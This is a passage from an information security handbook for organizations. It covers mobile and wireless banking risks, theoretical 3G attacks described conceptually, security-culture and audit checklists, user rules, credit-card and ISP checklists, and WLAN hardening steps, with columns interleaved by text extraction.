Weaknesses on and off the network), and corrupt SMS packets that The common flaw in any of these devices, no matter can crash the software on most handsets. what network, is the Wireless Application Protocol stan- dard, which also includes Wireless Markup Language SIM Toolkit technology (STK) can be used to provide (WML) and Handheld Device Markup Language (HDML). encryption security through the SMS channel. However, For the sake of convenience, developers try to require this is a transport layer security mechanism, and it does the least amount of keystrokes when entering in credit not provide end-to-end confidentiality for the customer card number, personal, or account information. This PIN. Additional procedures for improving SMS security means that most of this information is still stored on a might include customers checking their personal assurance server, but the password to access that server is stored messages and the service provider, in turn, verifying the in a cookie on the handheld device, requiring only a registered phone numbers of customers. PIN or sometimes nothing at all to shop online or trans- fer funds. This leaves the actual mechanism used to The GPRS Vulnerability transport sensitive information end to end in these General Packet Radio Service (GPRS) is an IP packet-based untrusted public cellular networks, which is left to service that allows an always-on connection to the Wireless Transport Layer Security (WTLS). Internet. The main problem with this is that it still relies on SMS for WAP push requests. A spoofed (cloned) SMS Unless 128 bit SSL for mobile commerce or IPSEC for packet can be sent to the phone requesting a redirected Enterprise access is being used (which most handsets site and fooling users into entering their information into can't support due to lack of processing power and what they believe is a secure order form, but is really a bandwidth), there will be a weak link somewhere in 136 INFORMATION SECURITY AND GOVERNMENT POLICIES the network that can be exploited. Even then, this only Payments through Third Parties pushes the weakness out to the end devices that are communicating, and can be easily lost. GSM uses the As a general rule, banks should directly authenticate Wired Application Protocol (WAP) and also the Wireless their own customers in respect of the wireless payment Transport Layer Security (WTLS). This is equal to Secure transactions made. Customers may, however give their Socket Layer (SSL) but has weaker encryption algo- banks specific standing authorizations to accept pay- rithms. WTLS is not compatible with SSL, which is the ment debits from specified providers or third parties to industry standard. Wireless messages travel through a charge the customers' accounts. Such arrangements "gateway" which channels them to a wired network for could, for example, be made through Direct Debit retransmission to their ultimate destination. At the Authorization agreements. However, when operating gateway the WTLS message is converted to SSL. For a under these arrangements, third parties should neither few seconds, the message is unencrypted inside the obtain nor store the customers' personal banking IDs or gateway, which in turn makes the communication PINs for the purpose of raising debit transactions vulnerable to interception. against the customers' bank accounts. V. Security Solutions for GSM Stored Value Accounts (SVA) The inherent problems affecting GSM are not easily SVAs are utilized by customers who transfer funds into corrected. The telephones and PDA's that utilize GSM these accounts for the purpose of making periodic technology typically cannot upload protective firmware payments. SVAs may reside in mobile devices. No bank andsoftware. Users are at the mercy of the telephone account should be accessed in making a payment. Bank developer. Whereas GSM is not vulnerable to war driving accounts should be used only for replenishing SVAs at like its American counterpart, 802.11, it is suffering the customer's direction. from four core vulnerabilities. The 802.11 standard is geared towards computers not hand-helds and thus Close Proximity Wireless Payments security can be improved much more drastically for 802.11 than for the GSM protocol. Virtual Private Close proximity wireless payment services are typically Networks are the common thread between the two. intended for over-the-counter retail payments. Such The establishment of VPNs is commonly referred to transactions should be completed only after customers as the solution for the existing vulnerabilities of GSM have given explicit authorizations at points-of-sale. In and 802.11. However when it comes to proper layered the absence of such authorizations, it is possible that security there are no magic bullets. Further information customer's funds may be involuntarily deducted from on securing wireless networks may be found at the their SVA. Thus, explicit authorization should be end of Part 3 and in Part 5: Security for Technical mandatory for any payment request. Administrators. Interactive Voice Response (IVR) VI. Banking Security Practices 83 Mobile IVR services are vulnerable to eavesdropping As a result of the widespread usage of GSM for the through the interception of calls. IVR systems should delivery of e-financial services, there are certain not be used for high-risk and/or value services. All IVR control and security standards that financial providers sessions should be recorded including the caller's phone should adhere to when providing wireless access to number, the sequence of transactions made by a cus- payment systems. tomer. Pin or authentication data should not be logged. 83Section provided by Tony Chew, Director, Technology and Risk Supervision of the Monetary Authority of Singapore. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 137 Customer Education · Integrity mechanisms for the terminal identity (IMEI) have been designed in from the start, Banks should educate the consumer of mobile e- finan- rather than that introduced late into GSM. cial services in the following ways: · Customers should be advised to use different PINs · The authentication algorithm has not been defined, for different online services. but guidance on choice will be given. · Instructions should be provided to customers on · When roaming between networks, such as between a how to configure their mobile devices to access GSM and 3GPP, only the level of protection supported mobile banking and payment applications in a safe by the smart card will apply. Therefore, a GSM smart manner. card will not be protected against the false base · Customers should be advised as to the appropriate station attack when in a 3GPP network. dispute handling, reporting procedures, and the expected time for resolution of complaints. The 3G system is far more secure than her GSM counter- part. That being said, the ingenuity of nefarious indi- A View into the Future: 3G Technology viduals should never be underestimated. Given this, there are certain attacks that are theoretically possible 3G s signifies third generation of wireless communica- on a 3G network. They are described below. tion technology. It refers to pending improvements in wireless data and voice communications through any of Camping on a False Base Station a variety of proposed standards. The immediate goal is P to raise transmission speeds from9.5K to 2M bit/sec. In An attack that requires a modified Base Station/Mobile ART systems and communications security the goal is not to Station (BS/MS) and exploits the weakness that a user design a flawless system, but a system that can adapt can be enticed to camp on a false base station. A false to security enhancements as the need for them is iden- BS/MS can act as a repeater for some time and can THREE tified. Several of the attacks that were possible on 2G relay some requests in between the network and 2.5G networks have been addressed and eliminated and the target user, but subsequently modify or ignore in the 3G environment. certain service requests and/or paging messages related to the target user. The Strengths of 3G's Security Structure The security architecture does not prevent a false BS/MS 3G security was based on GSM security, with the relaying messages between the network and the target following important changes: user, neither does it prevent the false BS/MS ignoring certain service requests and/or paging requests. · A change was made to defeat the false base station Integrity protection of critical message may however attack. The security mechanisms include a sequence help to prevent some denial of service attacks, which number that ensures that the mobile can identify are induced by modifying certain messages. Again, the the network. denial of service in this case only persists for as long as · Key lengths were increased to allow for the possibility the attacker is active unlike the above attacks, which of stronger algorithms for encryption and integrity. persist beyond the moment where intervention by the · Mechanisms were included to support security within attacker stops. These attacks are comparable to radio and between networks. jamming which is very difficult to counteract effectively · Security is based within the switch rather than the in any radio system. base station as in GSM. Therefore, links are protected between the base station and switch. 138 INFORMATION SECURITY AND GOVERNMENT POLICIES Forcing Unencrypted Communications The market has followed the trend of the so-called Pelton Merge84 that calls for continued improvement of This attack requires a modified BS/MS. While the target "seamless interface standards" that allows the smooth user camps on the false base station, the intruder pages interconnection of fiber, coax, terrestrial wireless, the target user for an incoming call. The user then initi- satellites, and other new and evolving technologies, ates the all set-up procedure, which the intruder allows such as high altitude platforms. The challenge is to to occur between the serving network and the target develop standards that allow easy and reliable user, modifying the signaling elements such that for the interconnection and also protect security. serving network it appears as if the target user wants not enable encryption. After authentication the intruder One possible solution might be to re-examine the ISO cuts the connection with the target user, and subsequently seven layer model of telecommunications and, in partic- uses the connection with the network to make fraudulent ular, to consider the creation of a new layer that provides calls on the target user's subscription. truly secure based on a 256 or even 1024 bit code that is constantly updateable. Further study would need to be Integrity protection of critical signaling messages given to whether the ultimate solution is a separate layer protects against this attack. More specifically, data or the re-engineering of part of an existing layer that authentication and replay inhibition of the connection could be devoted to this task. Nonetheless, the risks set- up request allows the serving network to verify that associated with e- finance are great. the request is legitimate. In addition, periodic integrity protected messages during a connection helps protect The confidentiality and integrity threat posed by the against hijacking of unenciphered connections after the GSM and 802.11 protocols can be mitigated to an initial connection establishment. However, hijacking the extent. Beyond the use of VPNs, the protection of the channel between periodic integrity protection messages gateway and the correspondent servers is essential. It is is still possible, although this may be of limited use important for banking institutions to comprehend the to attackers. In general, connections with ciphering various methods that may help to protect the network disabled will always be vulnerable to some degree of resources themselves while the VPN technology protects channel hijacking. the authorized payload. Banks and their correspondent telecom partners should begin to institute proper lay- Again it should be pointed out that these attack ered security measures particularly at the "gateway" profiles are theoretical in nature based on an level. Mitigation of the risk associated with mobile understanding of how the technology will be communications will become more critical as commerce deployed. All in all, 3G systems have enhanced and and finance increasingly are conducted over what improved security technology in place, but continued amount to vulnerable, integrated technologies. The vigilance is necessary to maintain their security to widespread adoption of WLANs and GSM technologies by set-up a mobile originated call. financial institutions around the world has weakened the security of the payment system. These porous medi- VII. Conclusion ums were not developed for the movement of digital assets. As the apparent trends of e- finance continue, The most distributed networks are the most vulnerable "mobile risk management" is going to become increasingly to interception and unauthorized access. There is often more important to the banking industry in the maximum vulnerability to interception at the point years ahead. where there is interconnection between fiber, coax, satellite, and terrestrial wireless systems. Air interface standards are but one example where modern telecom- munications and IT systems are open to interception. 84Contributed by Dr. Pelton, Executive Director of the Clarke Institute. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 139 CHAPTER 11. and customers), and audit and monitor for quality BEST PRACTICES: BUILDING assurance. A prudent approach might reflect the A SECURITY CULTURE following thesis: "Expect to be hit ­ Prepare to survive." At a Glance The three general axioms to remember in building a security program are as follows: In Part 3 we have described the security role and functions · Attacks and losses are inevitable. in the organization, whether that organization is a · Security buys time. small or medium-sized business, a non-profit entity, · The network is only as secure as its weakest link. an academic institution, or a government agency. In discussing the responsibility for organizational security, 12 core layers of proper security are essential for main- we have emphasized that someone must take the lead taining the integrity of data and mitigating the risks role, but we have not assumed that there will be an associated with open architecture environments, and in exclusive staff position of Chief Security Officer, for many instances, actual implementation of a specific layer example, with the exception of larger organizations. In need not entail large capital investments or outlays. SMEs there are often budget and staffing constraints that make it unlikely to have official Chief Security 1.Information Security Officer--The creation of the Officers (CSOs) or other full-time security experts on the position of Chief Security Officer who overseas that payroll. Nevertheless, any enterprise driven by or the other 11 layers are carried out and implemented dependent on technology should have one person, or at P in accordance with the best practices below (and most a small group of people, designated with responsi- ART details available in Glaessner, Kellermann and bility for security. Uniform procedures, good reporting McNevin, "Electronic Security: Risk Mitigation in standards, and vigilant, but friendly, relationships with Financial Transaction") other employees, outside contractors, vendors, and cus- THREE 2.Risk Management--A broad based framework based tomers will help this employee or team perform the nec- upon CERT's OCTAVE paradigm for managing assets and essary functions for the organization. This chapter pro- relevant risks to those assets. vides detailed suggestions on taking a layered approach 3.Access Controls/Authentication--Establish the legit- to security, including a policy statement on the twelve imacy of a node or user before allowing access to layers of security. This statement is followed by a requested information. During the process, the user selection of checklists that will help employees and enters a name or account number (identification) and members of the management team with day-to-day password (authentication). The first line of defense is responsibility for security in the organization. access controls; these can be divided into passwords, Best Practices: The 12 Layers of E-Security tokens, biometrics, and public key infrastructure 85 (PKI). 4.Firewalls--Create a system or combination of systems Management of e-security risks can be thought of as a that enforces a boundary between two or more net- twofold process. The first part is risk analysis, which has works. three major components: identify and inventory assets 5.Active content filtering--At the browser level, it is for a baseline, analyze and assign values to the assets, prudent to filter all material that is not appropriate for and establish how critical each asset is, in priority order. the workplace or that is contrary to established work- place policies. The second part of security is development of an 6.Intrusion detection system (IDS)--This is a system approach to risk management. The major elements dedicated to the detection of break-ins or break-in of risk management are to develop and implement attempts, either manually or via software expert systems policies and procedures, educate users (employees 85Source: Glaessner, Thomas, Kellermann, Tom, McNevin, "Electronic Security: Risk Mitigation in Financial Transactions -Public Policy Issues," June 2002, The World Bank. 140 INFORMATION SECURITY AND GOVERNMENT POLICIES that operate on logs or other information available on company executives who will lead the security the network. Approaches to monitoring vary widely, policy effort. depending on the types of attacks that the system is expected to defend against, the origins of the attacks, Are executive-level summaries produced regularly? the types of assets, and the level of concern for vari- How often? ous types of threats. Does a clear communication path exist from the top 7.Virus scanners--Worms, Trojans, and viruses are level of management to the line-level workers? methods for deploying an attack. A virus is a program Does everyone know what or where that communication that can replicate itself by infecting other programs path is? on the same system with copies of itself. Trojans do Does responsibility for security rest with a Vice not replicate or attach themselves to other files. Virus President, Director of Security, or other member of scanners hunt malicious codes. management? 8.Encryption--Encryption algorithms are used to Has management demonstrated that it is committed protect information while it is in transit or when ever to the company's security program by appropriately it is exposed to theft of the storage device (e.g. presenting and enforcing it? removable backup media or notebook computer). Has adequate funding for security been allocated and 9.Vulnerability testing--Vulnerability testing entails made available? obtaining knowledge of vulnerabilities that exist on Do all system administrators understand the importance a computer system or network and using that knowl- of reporting and resolving security issues quickly? edge to gain access to resources on the computer or Is security awareness training provided as part of the network while bypassing normal authentication barriers. standard orientation for new employees at all levels 10.Proper systems administration--This should be from line-level to upper management? complete with a list of administrative failures that Have steps been taken to ensure that all employees typically exist within financial institutions and from the top down are aware of the company's corporations and a list of best practices. information-protection policies? 11.Policy Management Software--a software program Were the realities of the company's culture (in terms should control company policy and procedural of management/worker relationships) considered when guidelines vis-à-vis employee computer usage. the security policies and procedures were developed? 12.Business Continuity/Incident response plan Do employees know whom to call for help when a (IRP)--This is the primary document used by a security breach occurs or when they don't understand corporation to define how it will identify, respond to, their roles? correct, and recover from a computer security incident. Are security audits conducted regularly? Every 6 The main necessity is to have an IRP and to test it months? Yearly? periodically. Employees' Responsibilities Executive Support Checklist 86 In order to foster a security culture, managers must: As we have seen in previous chapters, education and awareness of security issues are key to creating an envi- - Explain what constitutes a good security program. ronment where employees are best able to assist in the - Emphasize that security is important at all levels of protection of their organization. In part, the personnel the organization. will take their lead from the management team's atti- - Encourage people to ask questions on technology tude toward security issues and the corresponding and procedures related to security. investment in training and communication on security - Ask that the entire team be vigilant and report any and related areas. The checklist is designed for unusual activity, both in the office and over the network. 86Source: ITS, Chapter 3 Executive Support, p. 50. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 141 - Outline what is being done to protect employees' Are management's goals tied to security? privacy and security, but make it clear that Are routine audits conducted to verify risk-assessment allegiance to the organization comes first conclusions? and intentional security breaches will not be tolerated. Are external auditors used when appropriate is assessing and reducing risk? The following checklist is designed to help managers train employees to assist in the security function: Are all employees (managers, as well as system administrators) assigned and evaluated based on Security Training Checklist87 security goals? Do all managers, from the top down, voice a corporate Loss Prevention Checklist89 commitment to security? Do they back up that commitment with funding for Do you know what you are trying to protect on your security training? network? Does that training program include details on Was management involved in risk assessment? configuring and supporting security? Are policies easy to read and understand? Do security training policies exist? Does everyone either have a copy of the policies or at Are they thorough, current, and widely known? least have access to one? Are all employees, including executive managers, Does someone "own" responsibility for the policies P trained on their security responsibilities for the and procedures? ART company? Does the policy owner attend security conferences and Does a framework exist for developing and continuing keep current on policy issues? security awareness? Do you conduct periodic audits to verify that security THREE controls are in place? Control and Risk Management Framework Are you sure that all person's installing your systems have been trained on your company's security policies In Chapters 2, 3, and 4, we reviewed common threats and procedures? to security (risk evaluation) and loss analysis. We Do you double-check that all known security problems also developed guidelines for security policies and have been addressed before bringing new hardware or procedures that would strengthen the organization's software systems online? resistance to attack and accidental loss. The response Do you configure and review audit logs? How often? plan included a listing of practical security assessment and suggested a range of perimeter defenses. Physical Security: Internal and External Networks The following checklists offer further detail on risk Physical security has been covered in varying degrees of assessment and loss prevention. detail in Part 2 (Security for Individuals), Part 3, and Part 5 (Security for Technical Administrators). On the Review your Risks Checklist88 technical side, there are a number of areas to cover from a security standpoint, including internal networks, Was a risk assessment completed recently? How often external networks, and control of access to networks. is it updated? The following checklists are designed to aid in the effort to protect the physical assets in a networked Have systems been classified by risk level (non-critical, environment. critical, mission critical)? 87Source: ITS, Chapter 5 Security Training, p. 81. 88Source: ITS, Chapter 6 Unplanned Security, p. 95. 89Source: ITS, Chapter 2 Out-of-the-Box Security, P. 32. 142 INFORMATION SECURITY AND GOVERNMENT POLICIES Internal Network Security Checklist90 Are lessons learned from break-ins shared and used to build better processes? Are there policies and procedures for system configurations? Network Access Checklist92 Do those policies and procedures cover files Is management involved in the external-connection permissions, passwords, and patches? approval process? Do you disable unnecessary services? Does someone keep track of external connections? Is there a policy covering physical security? Does management know how many employees and Do all account users have passwords? contractors have external connections? Have any default accounts installed with the systems Are unnecessary network services disabled? been changed? Are all outside connections evaluated for true need Are default guest accounts banned as a matter before approval? of policy? Does your company conduct routine audits to Are dormant accounts regularly disabled? maintain control over external connections? Are security patches applied as part of the installation Are procedures in place to disable connections when for all new systems? employees and contractors resign? Do you try to crack the passwords on the systems you Do policies and procedures exist for installing firewalls? support to test for easily-guessed passwords? Do policies and procedures exist for installing How often? customer connections (extranets)? Do you look for unauthorized changes to files? Are all connection-related policies and procedures How often? enforced? Do you use caution when exporting file systems? Security Audits External Networks and Firewalls Checklist91 While an organization may spend a great deal of time Are security roles and responsibilities clearly defined? and money crafting excellent security polices and proce- Has someone been assigned to audit the firewall on a dures, training employees, and listening to its managers regular basis? How often? and security experts, the efficiency of these efforts must Has someone been assigned to regularly conduct be tested from time to time. Security audits will find firewall penetration tests? holes in the security plan which may not have been Has someone been assigned to upgrade the firewall understood, or may have arisen with growth and change when necessary? in the lifecycle of the organization. Security audits are Are firewall administration, upgrades, and routine also useful in helping to ensure compliance; if would be maintenance adequately funded? violators know that you are on the lookout for them, Do managers understand their own security roles and they may curtail their activities on your systems. those of the people who report to them? Are emergency roles and responsibilities clearly, and Among the most common mistakes discovered by formally, defined? routine audits: Do support personnel have specific preventive procedures to follow? - Security patches are not installed Is intrusion detection software installed on networks - Excessive file permissions have been granted and systems? - Passwords are easy to guess Is auditing software installed on mission-critical - Unnecessary network services are enabled systems? - Firewalls are not on or not enforced Is virus protection installed at every entry point? 90Source: ITS, Chapter 8 Internal Network Security, p. 121. 91Source: ITS, Chapter 7 Maintaining Security, p. 109. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 143 The following checklist is provided to set a baseline for your security audits, whether they are conducted by internal staff or outsourced to security professionals in your area. Audit Procedures Checklist93 Does your company have a formal audit policy? Does your company have written audit procedures for testing security? Are audits conducted on a regular schedule? Is auditing software installed on all platforms in use (Windows, Mac, Unix/Linux)? Is funding provided to buy the required auditing tools? Does management support security auditing by providing the right training for auditors? Outsourcing P Finally, we are aware that the complexity of IT security ART may prompt some organizations to hire outside special- ists to handle their security needs. The chapter on out- sourcing provided a detailed discussion of what to look THREE for in outsourcing firms, how to manage their activities, and when to increase your scrutiny of their practices at your location. The following checklist serves as an additional resource to firms that are considering the use of outside contractors for the security function. Outsourcing Security Checklist94 (Technical considerations) Are supplier and customer connections (extranets) audited on a regular basis? How often? Does a formal architecture exist for connecting suppliers and customers to your network via extranets? Does a formal policy exist to spell out when, why, and how extranet connections will be permitted? Is management approval required before brining an extranet connection online? Is a formal security audit required before bringing an extranet connection online? 93Source: ITS, Chapter 9 Outsourcing Security, p. 133. 94Source: ITS, Chapter 9 Outsourcing Security, p. 133. 144 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 12. Twenty-five Specific Rules for More GENERAL RULES FOR ALL COMPUTER Secure Computing USERS AND COMPANIES ENGAGED IN E-COMMERCE Rule 1: Think about computer theft before it happens. Four Easy Steps to a More Secure Computer Rule 2: Make backups regularly and take steps to ensure that they will survive if your computer is physically Running a secure computer is a lot of work. If you don't threatened. have time for the full risk-assessment and cost-benefit analysis described previously, we recommend that you Rule 3: Select passwords that you will be able to at least follow these four easy steps: remember but will be very difficult for someone else to guess. 1. Decide how important security is for your site. If you think security is very important and that Rule 4: Keep your operating system and key application your organization will suffer significant loss in the software up-to-date. case of a security breach, the response must be given sufficient priority. Assigning an overworked Rule 5: Configure your mail program not to open attach- programmer who has no formal security training to ments automatically. handle security on a half-time basis is a sure invitation to problems. Rule 6: Before opening any attachment, look at the name to verify that it is not an executable program. 2. Involve and educate your user community. Do the users at your site understand the dangers Rule 7: Never open an attachment from someone you do and risks involved with poor security practices not know unless you are very sure that it is a type of (and what those practices are)? Your users should file that cannot contain malicious code. know what to do and who to call if they observe something suspicious or inappropriate. Educating Rule 8: Do not open an attachment from someone you your user population helps make them a part of do know and trust unless you are sure that they sent your security system. Keeping users ignorant of it deliberately. system limitations and operation will not increase the system security--there are always other Rule 9: Consider configuring your e-mail program sources of information for determined attackers. to not process "fancy" HTML and not to send it to other computers. 3. Devise a plan for making and storing backups of your system data. You should have off-site back Rule 10: Check with your ISP to see if they are ups so that even in the event of major disaster, checking e-mails for viruses and similar threats you can reconstruct your systems. before delivering e-mail. 4. Stay inquisitive and suspicious. If something Rule 11: Do not allow web sites to download and happens that appears unusual, suspect an intruder execute potentially malicious programs on your and investigate. You'll usually find that the computer unless you know that the site is trustworthy. problem is only a bug or a mistake in the way a system resource is being used. But occasionally, Rule 12: Display the web site address you are visiting you may discover something more serious. For this and the address you are linking to, and pay attention reason, each time something happens that you to them while visiting an unfamiliar web site, especially can't definitively explain, you should suspect a if you are allowing the site to execute programs on security problem and investigate accordingly. our computer. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 145 Rule 13: Consider controlling under what situation Rule 24: If you use remote access facilities to remotely you allow cookies to be stored on your computer. control any computers, make sure that they have robust If you cannot control them (such as when using a security (at the very least, excellent usernames and computer in a public location), consider not entering passwords) to ensure that attackers do not use these private information. same tools. Rule 14: If there is any sort of private information Rule 25: System functions and applications logs displayed on a web page, clear the cache after the should be judiciously enabled. session is over. If you cannot clear the cache (from a computer in a public location, for example), you may Checklist for Companies Engaged in decide not to use this particular computer for the task. Credit Card Transactions Rule 15: If you are not using file sharing, disable it. A) If your computer is not on a network: If you are using it, to the extent possible, limit the · The company's computers should be kept in a kinds of things that can be done to those functions physically secure location. that you need. · A robust password is used to unlock the computer and a minimum number of people should know the Rule 16: If you use file sharing, set robust usernames password. and passwords and limit the access permissions to the · Physical access allows a person to circumvent least possible that will allow you to do your work. passwords, so physical security is important. If you P have physical access to the machine, you can boot ART Rule 17: If you share files with another user, make sure it using a CD or floppy, completely bypassing all that they take security seriously. security measures built into the operating system and application (other than encryption). THREE Rule 18: Instant messaging can be very helpful, but use · File-level security should be used to restrict access it with care and knowledge. to data; only those people that must work with the data should have access to it. (For Windows Rule 19: Disable all Internet services that are not needed machines, this means you must use the NTFS file and used regularly. system). · Deploy up-to-date security patches on the operating Rule 20: Every computer that is vulnerable to viruses system, the database system and all application should run anti-virus software and should check for software. Note that more recent versions of operating up-to-date virus signatures daily. A full scan of the systems are much easier to secure than older machine should be performed periodically as well. versions. · Run anti-virus and intruder detection software on Rule 21: Computers that are not particularly subject to the system. viruses such as Unix-based systems should nevertheless · Credit card data files should be encrypted with ensure that the mail that they send out does not strong encryption. contain a virus that may harm the recipient. · Precautions should be taken to ensure that temporary files do not contain unencrypted information. When Rule 22: Keep your operating system and key application no longer needed, these files should not be simply software up-to-date. erased, they should undergo the electronic equivalent of shredding. Rule 23: All computers should be protected by a firewall · Logs should be used to track all accesses to of some sort, either software within the computer, or an sensitive files, and the logs should be scanned external firewall protecting that computer or an entire regularly for potential problems or error indications. local network of computers. Consider writing two copies of logs and locating the second log on a different host than the one running the application. 146 INFORMATION SECURITY AND GOVERNMENT POLICIES · Monitor security alert mailing lists to ensure that if C) If credit card information is accessible via the WWW: there is a potential breach related to your systems, · All previous items mentioned above, and: you know about it quickly. · Do not put credit card information on an Internet- · In the case of a potential or actual breach, take all accessible machine. Keep the data on a separate precautions immediately to reduce risk ­ containment. machine behind a firewall and use a remote procedure · Ensure that all staff understand that security is call (RPC) or other communications method to important to the organization and that senior man- access the file, with appropriate filtering at the fire agement places it very high on its priority list. wall. · If you dispose of the hard disk, which contains · Encrypt the transactions over the network (SSL or an credit card or other financial data, make sure that equivalent) using the strongest encryption practical the data is no longer accessible; this procedure goes (128 bit, if available). beyond deleting the files; seek professional · Ensure that credit card information that is temporarily assistance if you are not sure how to destroy data stored on the web server is erased once the completely. transaction is complete. · Make regular backups and ensure that backups which contain credit card information are handled securely. If credit card information must reside on the · Publish a Privacy Policy telling your users that you Internet-accessible machine: are storing this information, what you will use it · All of the above precautions apply, but with for, and (in vague terms) how you are protecting it. increased awareness of the security risks ­ monitor · If you do credit card charge validation online, make this machine, the transactions, and the logs very sure that this link is secure. If you are working with carefully. a dial-up modem, ensure that incoming calls are not allowed. Checklist for Consumer Data Protection · If you print records with credit card information on on a Web Site them, physically secure them, and shred them when they are no longer needed. Here is a simple but workable policy that we recommend · Buy several up-to-date books from respected sources for web sites that are interested in respecting personal on e-commerce security, read them, and follow their privacy. Tell people about your policy on your home advice. O'Reilly & Associates, John Wiley & Sons and page, and allow your company to be audited by outsiders Osborne/McGraw-Hill have excellent books on the if there are questions regarding your policies. subject of IT security. Such books may be expensive, depending on your location, but they are a good · Do not require users to register to use your site. investment. · Allow users to register with their e-mail addresses if they wish to receive bulletins. B) If the computer must be accessible to · Do not share a user's e-mail address with another internal network: entity without that user's explicit permission for · All the items mentioned above, and: each organization with which you wish to share the · Set up a firewall to ensure that only legitimate e-mail address. users and transactions can contact this machine, · Whenever you send an e-mail message to users, and that general Internet access is not allowed. explain to them how you obtained their e-mail · Install up-to-date security patches on all network addresses and how they can get their addresses off equipment (routers, firewalls, switches, etc.). your mailing list. · Consider using encrypted transmission for all credit · Do not make your log files publicly accessible. card-related messages. · Delete your log files when they are no longer needed. · Turn off all network services on the computer that · If your log files must be kept online for extended are not essential (such as File Transfer Protocol, periods of time, remove personally identifiable Remote Procedure Call, web server) information from them. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 147 · Encrypt your log files if possible. · Ensure that you use robust passwords and restricted · Do not give out personal information regarding access rules for all of your management machines, your users. service machines (such as e-mail, web, authentica- · Discipline or fire employees who violate your tion, proxy and DNS servers) and all network routing privacy policy. and monitoring equipment. · Ensure that all non-essential services (ftp, icq, Checklist for Internet Service finger, compilers, etc.) are disabled on machines Providers (ISPs) accessible to the Internet. · Ensure that all machines, but particularly ones This list is more inclusive than many ISPs will implement, accessible to the Internet are kept up to date with but it is important to assess all options and make respect to security patches. conscious business decisions regarding which you · Establish continuous network monitoring so that will implement. you can recognize problems such as denial of service attacks and major spam and virus activities. This · Since you certainly store credit card and/or other requires understanding what your normal traffic customer financial information, all of the rules for patterns are. credit card storage apply. · Establish computer monitoring capabilities to · Security should not be haphazard ­ understand the attempt to recognized computer intruders (don't issues and draw up a plan. forget machines housing logs, accounting data) · Establish a security policy including: to what extent · Consider installing virus checkers for all incoming P you will respect the privacy of customer data (with and outgoing e-mail. ART respect to access by your staff or outside agencies); · Consider making one of the free or low-price anti- reporting processes in the event of a security breach virus products available to your customers to (reporting both within your organization, to outside encourage them to be secure. THREE Internet providers, and the authorities). · Protect you mail servers from being used as spam · Identification of your legal responsibilities (are you relay points. a common carrier, to what extent must you retain · Consider installing spam control measures. log files, etc.) · Log all server accesses and network connection/dis · Establish policies on how you will respond to connections maximizing your ability to retroactively security alerts and concerns from your clients, from do forensic analysis to understand security breaches. other peer ISPs, from your major bandwidth · Establish a rigorous and redundant set of procedures providers and from the rest of the Internet. for backing up your data and that of your users. · Beware of the fact that certain customers of your · Consider downloading and distributing (electronically service may attack outside systems. You may develop or via CD) major software patches to your customers a policy for responding to reports from other ISPs (thereby making it easy for them to remain current that one of your customers is engaging in an attack, and secure, and reducing your international band spreading a virus, etc. width). · You may decide not to send virus-blocked notifications back to senders via e-mail if ISP-wide virus scanning 15 Steps to Securing WLANs is in place. · Establish an Acceptable Use Policy (AUP) including Wireless network security is much like the physical security ISP and Client responsibilities. This AUP should be at the entrance of a building. Someone with enough referenced in any client contracts. interest, resources, and time is going to be able to gain · Design a network so that to the extent practical and access. First and foremost, it is important to treat your possible, the systems that control and manage your wireless network as though it were a publicly accessible network (including accounting) and fire walled from network. A system administrator should not make any the general Internet. assumptions that his or her traffic on that network is 148 INFORMATION SECURITY AND GOVERNMENT POLICIES private and secure. The following security recommenda- outside your building making it easier for people tions, compiled from a host of industry leaders, will to find you. provide some simple rules of thumb that can provide a foundation for securing a WLAN: 8. Provide directional antennas for wireless devices. Most wireless devices utilize omni-directional anten- 1. Create an institution wide policy regarding wireless nas, these antennae allow for systematic "sniffing" devices. Tailor the corporate security policy to address (recording) of all communications. Directional anten- network usage guidelines. nas coupled with a 2.4 Gig or higher frequency will lessen the propagation of the signal. 2. Track how many employees have WLANs at home. These remote access users need to be monitored, in 9. Turn WEP on and manage your WEP key by changing order to eliminate unauthorized wireless access points. the default key and subsequently, changing the WEP key on a weekly basis.95 3. Define an account provisioning process to securely manage client's accounts which includes tokens . 10.Use VPN tunneling between the network firewall and the wireless. Though it would require a VPN serv- 4. Disable all unneeded services and applications on er, the VPN client is already included in many operat- each client and server. Typically, all services and ing systems such as Windows 98 Second Edition, applications that are not known or in use should be Windows 2000, and Windows XP. disabled. 11.Deploy a network based intrusion detection system 5. Change the default settings of your product. Many (NIDS) on the wireless network.96 administrators make the mistake of not changing any of the SSID or IP address information for their access 12.Deploy enterprise-wide anti-virus software on all points. Don't change the SSID to reflect your compa- wireless clients. ny's name, divisions,or products. Since this information is broadcast by the access point, once the hacker has 13.Employ two-factor authentication. There are two broken WEP, they know exactly whose network they are ways in which two-factor authentication is best accessing. employed. First, token-based smart cards that store a biometric record.97 The two- factor approach mitigates 6. Change the default password on your access point a tremendous amount of risk. Second, the use of or wireless router. Hackers moften know the manufac- Radius Servers, which authenticate the machine to the turers' default passwords, and will try them first. network. A Radius server permits association with your access points. A user connects to the radius server 7. Plan your coverage to radiate out to the windows, merely for authentication to the other servers. One can but not beyond. As you do your site survey for access implement a biometric to initialize the server thus point deployment, think about locating the access abiding by the two-factor authentication mantra. points toward the center of your building rather than Radius98 servers act as a guard would in a lobby, near the windows. If the access points are located authorizing passage to the rest of the building. near the windows, a stronger signal will be radiated 95Input provided by the NIPC http://www.nipc.gov/publications/nipcpub/bestpract.html. 96Input provided by Chris Bateman of CERT Analysis Center. 97Bateman recommends the e-thenticator, which is a thumb print biometric scanner that stores the image on a smart card. 98RADIUS or Remote Authentication Dial-In User Service is an authentication service that verifies user information and once verified, allows users to access certain network services. Part of what RADIUS can provide is encrypted communication between the remote client and the RADIUS server. Virtual Private Networks (VPNs) work in a similar manner but tend to operate on a network-to-network connection instead of the remote host to network method of RADIUS. Once the remote computer is authenticated and connected to the internal network via a RADIUS server, it operates as if it were physically located near and connected to the network. In other words, the encryption provided by the RADIUS server is only between the RADIUS server and the client machine, not over the network as a whole. Rick Fleming stated that: "Cisco's Aeronet Tacacs Server is premier for this service." Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 149 14.Consider using a Wireless Firewall Gateway.99 This from one network to another. Second, data packets device operates as a standard dual-homed firewall with traveling the Internet are transported in clear text. the wireless network on one side and the trusted net- Consequently, anyone who can see Internet traffic work on the other. The firewall has security software can also read the data contained in the packets. This such as IPSEC 